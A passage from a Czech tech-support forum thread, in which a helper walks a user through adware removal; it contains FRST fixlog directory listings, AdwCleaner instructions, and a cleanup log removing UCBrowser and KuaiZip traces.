28.06.2014 17:53 <DIR> Splashtop
17.03.2017 14:52 <DIR> Steam
09.12.2013 20:14 <DIR> SugarSync
25.11.2016 08:37 <DIR> SunplusIT Integrated Camera
09.12.2013 20:17 <DIR> SymSilent
14.11.2016 10:12 <DIR> System Explorer
05.02.2017 12:49 <DIR> TC UP
17.03.2017 09:24 <DIR> TeamViewer
05.02.2017 12:30 <DIR> ThinkPad
05.01.2017 19:27 <DIR> TomTom HOME 2
09.11.2015 12:23 <DIR> TomTom International B.V
17.03.2017 14:48 <DIR> UCBrowser
28.07.2014 20:07 <DIR> VideoLAN
23.09.2014 10:19 <DIR> WarThunder
05.06.2014 12:46 <DIR> WIBU-SYSTEMS
05.06.2014 12:46 <DIR> WIBUKEY
17.03.2017 04:25 <DIR> Windows Defender
17.03.2017 04:25 <DIR> Windows Mail
01.11.2016 13:49 <DIR> Windows Media Player
16.07.2016 12:47 <DIR> Windows Multimedia Platform
16.07.2016 12:47 <DIR> Windows NT
17.03.2017 04:25 <DIR> Windows Photo Viewer
16.07.2016 12:47 <DIR> Windows Portable Devices
19.12.2014 02:23 <DIR> Windows Repair File Association
16.07.2016 12:47 <DIR> WindowsPowerShell
05.06.2014 10:32 <DIR> X-Rite
0 File(s) 0 bytes
101 Dir(s) 8˙421˙675˙008 bytes free

========= End of CMD: =========

========= dir "C:\PROGRA~3" =========

Volume in drive C is Windows7_OS
Volume Serial Number is 2A5A-65CD

Directory of C:\PROGRA~3

01.07.2016 10:57 <DIR> 3Dconnexion
29.11.2016 14:03 <DIR> 54F3DE4E-B7BA-4EBD-8B3B-385D272CC583
26.05.2016 23:03 <DIR> ABBYY
15.04.2015 00:04 <DIR> Abvent
07.06.2014 17:24 <DIR> Actual Tools
22.10.2015 13:29 <DIR> Adobe
23.12.2016 00:41 <DIR> Affinity
28.03.2016 17:28 <DIR> AomeiBR
08.03.2017 08:50 <DIR> Apple
08.03.2017 08:50 <DIR> Apple Computer
09.03.2015 16:00 <DIR> ASGVIS
09.11.2015 16:50 <DIR> Autodesk
09.04.2016 14:17 <DIR> AVerTV 3D
12.12.2014 22:42 <DIR> AVG
08.08.2016 08:20 <DIR> BIMTech
29.04.2016 17:23 <DIR> Binarysense
24.08.2015 09:33 <DIR> boost_interprocess
28.06.2015 17:40 <DIR> Cadimage Tools
09.12.2013 20:09 <DIR> CLSK
25.11.2016 10:16 <DIR> CodeMeter
16.07.2016 12:47 <DIR> Comms
01.08.2014 14:57 <DIR> CyberLink
05.09.2016 15:43 <DIR> Dropbox
05.02.2016 12:46 <DIR> Electronic Arts
29.11.2016 14:02 <DIR> EnterNHelp
03.07.2015 15:50 <DIR> Epic
07.08.2016 16:07 <DIR> ESET
09.11.2015 15:09 <DIR> FARO
21.04.2015 13:49 <DIR> FLEXnet
08.12.2015 01:00 <DIR> hps
25.08.2016 02:13 <DIR> IMSIDesign
09.12.2013 20:11 <DIR> install_clap
06.01.2017 14:56 <DIR> Intel
09.12.2013 20:21 <DIR> Intel(R) Update Manager
12.03.2017 14:57 <DIR> Lenovo
29.04.2016 17:23 <DIR> Licenses
29.04.2016 17:23 <DIR> Logs
14.12.2016 16:30 <DIR> Microsoft Help
02.08.2016 20:48 <DIR> Microsoft OneDrive
14.12.2016 16:30 133 Microsoft.SqlServer.Compact.351.64.bc
22.04.2016 19:10 95 Microsoft.SqlServer.Compact.400.32.bc
22.04.2016 19:10 89 Microsoft.SqlServer.Compact.400.64.bc
28.07.2014 17:49 <DIR> Next Limit
20.03.2015 20:04 <DIR> Nikon
01.12.2015 10:41 <DIR> Nokia
01.12.2015 10:40 <DIR> NokiaInstallerCache
16.07.2014 17:03 <DIR> Norton
09.12.2013 20:15 <DIR> NortonInstaller
17.03.2017 14:45 <DIR> NVIDIA
08.11.2016 23:28 <DIR> NVIDIA Corporation
23.04.2016 12:00 <DIR> Oracle
10.03.2017 15:58 <DIR> Origin
03.03.2017 12:52 <DIR> Package Cache
09.12.2015 08:58 <DIR> PC Suite
19.06.2014 08:21 <DIR> PDF Architect 2
01.03.2016 18:56 <DIR> PDF Architect 4
01.03.2016 18:51 <DIR> pdfforge
03.11.2014 19:21 <DIR> PlotSoft
08.11.2016 23:22 <DIR> PTC
02.08.2016 20:36 <DIR> regid.1986-12.com.adobe
14.03.2017 23:24 <DIR> regid.1991-06.com.microsoft
09.12.2016 00:21 <DIR> Reprise
09.12.2013 19:55 <DIR> Roaming
19.11.2015 15:32 <DIR> Samsung
01.03.2017 01:02 <DIR> SIGMA
08.11.2016 23:23 <DIR> SketchUp
03.03.2017 12:53 <DIR> Skype
16.07.2016 12:47 <DIR> SoftwareDistribution
28.06.2014 17:54 <DIR> Splashtop
17.03.2017 14:45 <DIR> Synaptics
29.10.2015 18:44 <DIR> SystemExplorer
10.12.2015 14:36 <DIR> SZCCID
17.03.2017 16:54 <DIR> Temp
17.12.2015 04:02 <DIR> tmp
29.11.2016 14:02 <DIR> Ultima_T15
02.08.2016 20:45 <DIR> USOPrivate
02.08.2016 20:45 <DIR> USOShared
25.09.2015 10:17 <DIR> Validity
09.12.2013 20:05 <DIR> X-Rite
09.12.2013 20:12 107 {324F76CC-D8DD-4D87-B77D-D4AF5E1AA7B3}.log
09.12.2013 20:09 105 {40BF1E83-20EB-11D8-97C5-0009C5020658}.log
09.12.2013 20:11 110 {B7A0CE06-068E-11D6-97FD-0050BACBF861}.log
09.12.2013 20:12 115 {D6E853EC-8960-4D44-AF03-7361BB93227C}.log
7 File(s) 754 bytes
76 Dir(s) 8˙421˙670˙912 bytes free

========= End of CMD: =========

========= dir "%localappdata%" =========

Volume in drive C is Windows7_OS
Volume Serial Number is 2A5A-65CD

Directory of C:\Users\Y\AppData\Local

17.03.2017 16:55 <DIR> .
17.03.2017 16:55 <DIR> ..
30.06.2016 21:47 <DIR> 3Dconnexion
08.06.2016 07:07 <DIR> ABBYY
14.11.2015 16:56 <DIR> ActiveSync
06.03.2017 07:13 <DIR> Adobe
17.03.2017 14:47 <DIR> Akamai
05.06.2014 12:46 <DIR> Apple
10.03.2017 04:59 <DIR> Apple Computer
14.03.2017 14:54 <DIR> Apple Inc
30.07.2016 09:54 <DIR> Apps
04.05.2016 06:32 <DIR> Autodesk
22.08.2015 20:38 <DIR> AVerMedia
12.12.2014 22:42 <DIR> Avg
22.09.2015 12:24 <DIR> CEF
12.12.2016 23:43 <DIR> Chromium
08.02.2017 16:32 <DIR> Comms
03.08.2016 03:41 <DIR> ConnectedDevicesPlatform
17.03.2017 09:23 <DIR> CrashDumps
23.10.2014 10:24 <DIR> Cyberlink
25.11.2016 15:12 3˙584 DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
23.02.2017 13:37 <DIR> Deployment
05.02.2017 12:05 <DIR> Diagnostics
06.01.2017 17:11 <DIR> Downloaded Installations
05.09.2016 17:12 <DIR> Dropbox
05.02.2017 12:05 <DIR> ElevatedDiagnostics
03.07.2015 15:50 <DIR> EpicGamesLauncher
28.08.2014 15:14 <DIR> ESET
22.04.2016 19:10 <DIR> Finkit
01.12.2014 09:59 <DIR> fontconfig
09.07.2016 20:17 <DIR> Frontier_Developments
18.12.2014 14:37 <DIR> Futuremark
17.04.2015 21:34 124˙560 GDIPFONTCACHEV1.DAT
01.12.2014 09:59 <DIR> gegl-0.2
30.11.2015 10:22 <DIR> gegl-0.3
31.12.2016 19:05 <DIR> GHISLER
08.11.2016 13:10 <DIR> Google
12.12.2016 20:18 <DIR> Graphisoft
13.06.2014 17:22 <DIR> GS-LW-Temp
22.12.2016 22:48 <DIR> gtk-2.0
18.05.2016 20:18 <DIR> gtk-3.0
03.06.2015 05:44 <DIR> GWX
10.03.2015 14:09 <DIR> Image Composite Editor
05.06.2014 22:42 <DIR> Intel WiDi
05.06.2014 10:36 <DIR> Intel_Corporation
17.03.2017 16:55 <DIR> iRadio
26.07.2016 12:11 <DIR> krita
12.02.2015 14:06 <DIR> Kros_a.s
27.02.2017 07:53 <DIR> Lenovo
31.07.2016 13:26 <DIR> LenovoServiceBridge
25.11.2014 02:41 <DIR> Logitech
11.03.2016 15:00 <DIR> LSC
10.03.2017 09:11 626 ManicTime_2017-03-10.log
12.03.2017 14:52 629 ManicTime_2017-03-12.log
14.03.2017 22:04 316 ManicTime_2017-03-14.log
15.03.2017 07:13 316 ManicTime_2017-03-15.log
16.03.2017 19:44 629 ManicTime_2017-03-16.log
17.03.2017 14:47 626 ManicTime_2017-03-17.log
16.03.2017 09:22 <DIR> Microsoft
01.08.2016 16:45 <DIR> Microsoft Help
13.08.2015 08:31 <DIR> MicrosoftEdge
14.12.2016 20:18 <DIR> Microsoft_Corporation
13.08.2015 08:21 <DIR> NetworkTiles
14.12.2016 18:01 <DIR> Nikon
01.12.2015 10:45 <DIR> Nokia
23.08.2015 02:49 <DIR> NVIDIA
14.03.2016 16:30 <DIR> Opera Software
05.02.2016 12:46 <DIR> Origin
18.12.2015 20:02 <DIR> Package Cache
16.03.2017 14:16 <DIR> Packages
17.03.2017 09:24 <DIR> PDFCreator
12.08.2015 20:23 <DIR> PeerDistRepub
05.06.2014 10:28 <DIR> Power2Go
03.07.2016 14:01 <DIR> Programs
02.07.2016 01:12 <DIR> prospect
05.02.2017 13:12 <DIR> Publishers
09.12.2016 10:27 <DIR> qrSkope
18.05.2016 20:20 <DIR> RawTherapee
10.06.2016 14:40 218 recently-used.xbel
25.11.2014 02:45 17 resmon.resmoncfg
20.10.2015 20:07 <DIR> SCF
24.02.2016 10:14 <DIR> SecondLife
28.06.2014 08:12 <DIR> SIGMA
06.01.2016 10:42 <DIR> Skype
07.12.2016 17:37 <DIR> Snip
17.03.2017 14:47 258˙499 Snip.txt
09.12.2016 10:27 <DIR> SquirrelTemp
13.12.2016 07:51 <DIR> Steam
08.10.2015 17:16 <DIR> SugarSync
12.02.2015 14:11 <DIR> TeamViewer
17.03.2017 16:55 <DIR> Temp
12.08.2015 19:53 <DIR> TileDataLayer
09.11.2015 12:24 <DIR> TomTom
05.02.2017 11:40 <DIR> Tvsukernel
08.02.2016 21:12 <DIR> UnrealEngine
03.07.2015 15:50 <DIR> UnrealEngineLauncher
08.03.2017 15:49 <DIR> Viber
08.01.2016 15:50 <DIR> Viber Media S.a r.l
10.08.2015 23:31 <DIR> VirtualStore
05.06.2014 11:13 34˙171 WiDiSetupLog.20140605.121307.wdl
19.12.2014 02:25 <DIR> Windows Repair
06.12.2015 20:04 <DIR> Zoner
06.04.2016 20:03 <DIR> ZWSOFT
12 File(s) 424˙191 bytes
91 Dir(s) 8˙421˙666˙816 bytes free

========= End of CMD: =========

========= dir "%appdata%" =========

Volume in drive C is Windows7_OS
Volume Serial Number is 2A5A-65CD

Directory of C:\Users\Y\AppData\Roaming

17.03.2017 16:55 <DIR> .
17.03.2017 16:55 <DIR> ..
10.01.2016 23:57 <DIR> 3Dconnexion
26.05.2016 23:07 <DIR> ABBYY
20.04.2015 10:18 <DIR> Abvent_Artlantis6
07.06.2014 17:24 <DIR> Actual Tools
27.07.2015 10:22 <DIR> Adobe
10.11.2016 20:52 <DIR> Affinity
14.03.2017 16:02 <DIR> Apple Computer
24.06.2016 01:16 <DIR> Autodesk
12.12.2014 22:42 <DIR> AVG
21.06.2014 08:04 <DIR> Blender Foundation
28.06.2015 19:58 <DIR> Cadimage
28.06.2015 17:40 <DIR> Cadimage Tools
05.01.2015 23:55 <DIR> com.adobe.formscentral.FormsCentralForAcrobat
01.08.2014 11:04 <DIR> CyberLink
07.11.2015 17:20 <DIR> Digiarty
05.09.2016 17:12 <DIR> Dropbox
25.01.2016 09:08 <DIR> dvdcss
28.08.2014 15:14 <DIR> ESET
28.06.2015 19:58 <DIR> FrameWright Data
17.04.2015 20:55 <DIR> Free Font Renamer
25.06.2015 15:06 <DIR> FreeDownloadManager.ORG
30.11.2015 10:22 <DIR> GIMP
25.11.2016 12:29 <DIR> Graphisoft
12.12.2014 16:21 <DIR> HandBrake
02.10.2014 03:51 <DIR> HateML
23.12.2016 00:19 <DIR> HD Tune Pro
12.06.2015 08:41 <DIR> HEXelon
22.01.2016 08:13 <DIR> Identities
12.12.2014 22:40 <DIR> IHlpr
23.03.2015 17:47 <DIR> inkscape
25.11.2016 12:08 <DIR> Install.GS
05.06.2014 10:27 <DIR> Intel
26.06.2015 17:49 <DIR> Intel WiDi
16.05.2016 03:22 <DIR> iRadioDesktop
03.02.2015 21:33 <DIR> KeePass
02.06.2016 07:54 <DIR> krita
09.12.2016 17:52 <DIR> Kubity
05.06.2014 10:27 <DIR> Leadertech
22.12.2016 10:05 <DIR> Lenovo
12.03.2016 14:27 <DIR> LSC
09.12.2013 20:04 <DIR> Macromedia
25.11.2016 10:52 <DIR> MAXON
11.02.2013 19:28 <DIR> Media Center Programs
16.07.2014 16:48 <DIR> Minolta
09.11.2015 12:24 <DIR> Mozilla
14.12.2016 18:01 <DIR> Nikon
01.12.2015 14:46 <DIR> Nokia
01.12.2015 14:16 <DIR> Nokia Suite
11.11.2015 02:12 <DIR> NVIDIA
21.06.2014 08:00 <DIR> NVIDIA_ARC
18.10.2015 13:54 <DIR> OBS
12.12.2014 22:40 <DIR> OpenCandy
15.07.2014 07:23 <DIR> OpenOffice
14.03.2016 16:30 <DIR> Opera Software
05.06.2014 13:26 <DIR> Oracle
10.03.2017 17:13 <DIR> Origin
01.12.2015 14:07 <DIR> PC Suite
29.09.2014 13:10 <DIR> PDF Architect 2
17.03.2016 19:23 <DIR> PDF Architect 4
30.03.2016 10:42 <DIR> PDF Producer
14.12.2016 19:12 <DIR> Prodiance
16.03.2017 09:21 <DIR> Profiles
04.07.2016 19:28 <DIR> Prospect
05.06.2014 10:30 <DIR> PwrMgr
09.12.2016 10:28 <DIR> qrSkope
03.02.2015 10:51 <DIR> reaper
28.06.2016 18:09 <DIR> Samsung
24.02.2016 10:01 <DIR> SecondLife
09.12.2016 00:22 <DIR> SketchUp
17.03.2017 16:49 <DIR> Skype
07.01.2015 09:59 <DIR> SolidDocuments
05.06.2014 13:22 <DIR> SumatraPDF
22.08.2015 21:31 <DIR> Sun
17.03.2017 09:24 <DIR> TeamViewer
09.11.2015 12:24 <DIR> TomTom
23.11.2015 22:36 <DIR> Trimble Connect for SketchUp
10.03.2017 16:58 <DIR> ViberPC
16.03.2017 21:19 <DIR> vlc
03.07.2014 07:58 <DIR> WebApp
14.04.2015 11:11 <DIR> WinRAR
05.06.2014 10:32 <DIR> X-Rite
17.03.2017 10:33 <DIR> XnView
06.12.2015 19:52 <DIR> Zoner
06.04.2016 20:03 <DIR> ZWSOFT
0 File(s) 0 bytes
86 Dir(s) 8˙421˙658˙624 bytes free

========= End of CMD: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 41845549 B
Java, Flash, Steam htmlcache => 202751789 B
Windows/system/drivers => 70174951 B
Edge => 1533713 B
Chrome => 38606073 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 24126 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 822 B
NetworkService => 0 B
Y => 61983655 B
DefaultAppPool => 24126 B

RecycleBin => 1980062 B
EmptyTemp: => 399.5 MB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 17-03-2017 17:00:44)

"C:\Program Files (x86)\UCBrowser" => Could not move

==== End of Fixlog 17:00:47 ====

#6 Příspěvek od **altrok** » 17 bře 2017 17:11

Jedna se o soukromy nebo pracovni PC?

jarmyl · #7 Příspěvek od **jarmyl** » 17 bře 2017 17:13

pracovni i soukromy

#8 Příspěvek od **altrok** » 17 bře 2017 17:17

Ulozte na plochu AdwCleaner https://toolslib.net/downloads/viewdown ... dwcleaner/ (nebo http://www.bleepingcomputer.com/download/adwcleaner/ )

ukoncete vsechny programy
kliknete pravym na ikonu AdwCleaneru a vyberte Spustit jako spravce (v pripade Win XP spustte obycejne dvojklikem)
kliknete na Scan (Skenovani), pote na Clean (Cisteni)
po restartu na Vas vyskoci log (pripadne jej najdete v C:\AdwCleaner\AdwCleaner[Cx].txt), jehoz obsah zkopirujte do pristi odpovedi

jarmyl · #9 Příspěvek od **jarmyl** » 17 bře 2017 17:34

# AdwCleaner v6.044 - Logfile created 17/03/2017 at 17:26:44
# Updated on 28/02/2017 by Malwarebytes
# Database : 2017-03-17.1 [Server]
# Operating System : Windows 10 Pro (X64)
# Username : Y - Y-THINK
# Running from : C:\Users\Y\Desktop\adwcleaner_6.044.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support

***** [ Services ] *****

[-] Service deleted: ucdrv

***** [ Folders ] *****

[-] Folder deleted: C:\Users\Y\AppData\Roaming\IHlpr
[-] Folder deleted: C:\Users\Y\AppData\Roaming\OpenCandy

***** [ Files ] *****

[-] File deleted: C:\Users\Y\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Local Storage\hxxp_qtipr.com_0.localstorage
[-] File deleted: C:\Users\Y\AppData\Local\Google\Chrome\User Data\ChromeDefaultData\Local Storage\hxxp_qtipr.com_0.localstorage-journal

***** [ DLL ] *****

***** [ WMI ] *****

***** [ Shortcuts ] *****

***** [ Scheduled Tasks ] *****

***** [ Registry ] *****

[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML
[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML.AssocFile.CRX
[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML.AssocFile.HTM
[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML.AssocFile.HTML
[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML.AssocFile.MHT
[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML.AssocFile.SHTM
[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML.AssocFile.SHTML
[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML.AssocFile.WEBP
[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML.AssocFile.XHT
[-] Key deleted: HKLM\SOFTWARE\Classes\UCHTML.AssocFile.XHTML
[-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\GoogleChromeUpService
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\GoogleChromeUpService
[#] Key deleted on reboot: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\googlechromeupservice
[#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\googlechromeupservice
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.001
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.002
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.003
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.004
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.005
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.006
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.007
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.008
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.009
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.01
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.010
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.011
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.012
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.013
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.014
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.015
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.016
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.017
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.018
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.019
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.02
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.020
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.021
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.022
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.023
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.024
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.025
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.026
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.027
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.028
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.029
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.03
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.030
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.031
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.032
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.033
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.034
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.035
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.036
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.037
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.038
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.039
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.04
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.040
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.041
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.042
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.043
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.044
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.045
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.046
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.047
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.048
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.049
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.05
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.050
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.051
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.052
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.053
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.054
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.055
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.056
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.057
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.058
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.059
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.06
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.060
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.061
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.062
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.063
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.064
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.065
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.066
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.067
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.068
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.069
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.07
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.070
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.071
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.072
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.073
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.074
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.075
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.076
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.077
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.078
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.079
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.08
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.080
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.081
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.082
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.083
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.084
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.085
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.086
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.087
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.088
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.089
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.09
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.090
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.091
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.092
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.093
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.094
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.095
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.096
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.097
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.098
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.099
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.7z
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.arj
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.bz2
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.cab
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.gz
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.gzip
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.jar
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.kz
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.lzh
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.mou
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.rar
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.rpm
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.tar
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.tbz
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.tgz
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.wim
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.z
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip.zip
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.ape
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.bin
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.ccd
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.cue
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.flac
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.iso
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.isz
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.mdf
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.mds
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.nrg
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.vcd
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount.wv
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZipMount_FileAsso.Origin
[-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip_FileAsso.Origin
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.ContextMenuExt
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.ContextMenuExt.1
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.DragDropMenu
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.DragDropMenu.1
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.KYDropHandler
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.KYDropHandler.1
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.KzShlobj
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.KzShlobj.1
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.PropertyExt
[-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell.PropertyExt.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.001
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.002
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.003
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.004
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip.005
